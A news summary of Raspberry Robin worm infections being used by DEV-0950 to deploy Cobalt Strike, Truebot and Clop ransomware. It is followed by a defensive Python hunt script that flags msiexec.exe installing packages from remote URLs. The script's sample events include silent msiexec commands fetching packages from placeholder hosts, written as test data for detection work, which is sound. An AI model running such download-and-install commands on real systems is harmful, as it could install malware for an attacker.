"Raspberry Robin Operators Are Selling Initial Access to Compromised Enterprise Networks to Ransomware Gangs"

Microsoft has found evidence linking the Raspberry Robin worm to human-operated ransomware attacks. According to Microsoft Defender for Endpoint telemetry, nearly 3,000 devices in almost 1,000 organizations received at least one Raspberry Robin payload-related alert in the last 30 days. Microsoft observed the threat actor it tracks as DEV-0950 deploying Clop ransomware on the networks of organizations that had previously been infected with the worm; DEV-0950's activity overlaps with the FIN11/TA505 cybercrime group. In the DEV-0950 intrusions, the Raspberry Robin infection was followed by the deployment of a Cobalt Strike beacon, and in some cases the Truebot malware was delivered between the Raspberry Robin infection and the Cobalt Strike deployment. DEV-0950 has traditionally acquired most of its victims through phishing, so the shift to Raspberry Robin lets the group deliver payloads to existing infections and move its campaigns to the ransomware stage more quickly. Given the interconnected nature of the cybercriminal economy, the actors behind these Raspberry Robin-related malware campaigns may be paying the Raspberry Robin operators for malware installs. Raspberry Robin is a Windows worm first observed by Red Canary researchers in September 2021. It spreads via removable USB devices. Once running, it uses the Windows Installer (msiexec.exe) to connect to QNAP-related domains and download a malicious DLL, and it uses TOR exit nodes as additional command-and-control (C2) infrastructure. Raspberry Robin has been observed targeting organizations in the technology and manufacturing industries. This article continues to discuss the DEV-0950 group using Clop ransomware to encrypt the networks of organizations previously infected with the Raspberry Robin worm.
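The one mechanism the summary describes in any detail, Windows Installer being used to fetch a package from a remote host, is something a defender can turn into a hunt query over process-creation telemetry. The following is an added example written for this page, not code from the article, from Microsoft, or from Red Canary. It assumes Sysmon-style process-creation events flattened into key=value lines; the log lines and the host names in them are constructed placeholders, not Raspberry Robin infrastructure. It flags msiexec.exe launched with an http(s) URL as the package source (the normal case is a local .msi path) and notes when the install was requested silently.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation events in a Sysmon-like key=value form.
# Not real telemetry: host names are placeholders, not Raspberry Robin domains.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\msiexec.exe ParentImage=C:\Windows\System32\cmd.exe '
    r'CommandLine="msiexec /q /i http://nas-updates.example.invalid:8080/pkg"',
    r'EventID=1 Image=C:\Windows\System32\msiexec.exe ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="msiexec /i C:\Temp\vendor-setup.msi"',
    r'EventID=1 Image=C:\WINDOWS\SYSTEM32\MSIEXEC.EXE ParentImage=C:\Windows\System32\cmd.exe '
    r'CommandLine="MSIEXEC /Q /I HTTPS://download.example.invalid/installer"',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="powershell -c Invoke-WebRequest http://intranet.example.invalid/report"',
]

# key=value pairs; a value is either a double-quoted string (no embedded quotes) or a run of non-space characters
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r'\bhttps?://[^\s"]+', re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Turn one key=value log line into a dict, stripping the quotes around quoted values."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def msiexec_reasons(event: dict) -> list:
    """Return the reasons an msiexec.exe launch looks suspicious, or [] if it does not.

    Only msiexec.exe is considered; an http(s) URL as the package source is the trigger,
    and a quiet-install switch is recorded as a secondary indicator.
    """
    image = event.get("Image", "")
    if not image.lower().endswith("\\msiexec.exe"):
        return []
    cmd = event.get("CommandLine", "")
    if URL_RE.search(cmd) is None:
        return []  # local package path: ordinary software deployment
    reasons = ["remote_package_url"]
    tokens = cmd.lower().split()
    if any(tok in ("/q", "/qn", "/quiet") for tok in tokens):
        reasons.append("quiet_install")
    return reasons


def scan(lines) -> list:
    """Run the msiexec rule over raw log lines and return one finding per hit."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = msiexec_reasons(event)
        if not reasons:
            continue
        url = URL_RE.search(event["CommandLine"]).group(0)
        findings.append({
            "image": event.get("Image", ""),
            "parent": event.get("ParentImage", ""),
            "host": urlsplit(url).hostname,  # hostname is lower-cased, port dropped
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Legitimate deployment tooling does occasionally point msiexec at an HTTP package source, so treat a hit as a hunt lead rather than a verdict: the parent process (a cmd.exe chain rather than a management agent) and any preceding removable-media activity on the same host are what distinguish the worm's behaviour from an administrator's.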

Security Affairs reports "Raspberry Robin Operators Are Selling Initial Access to Compromised Enterprise Networks to Ransomware Gangs"
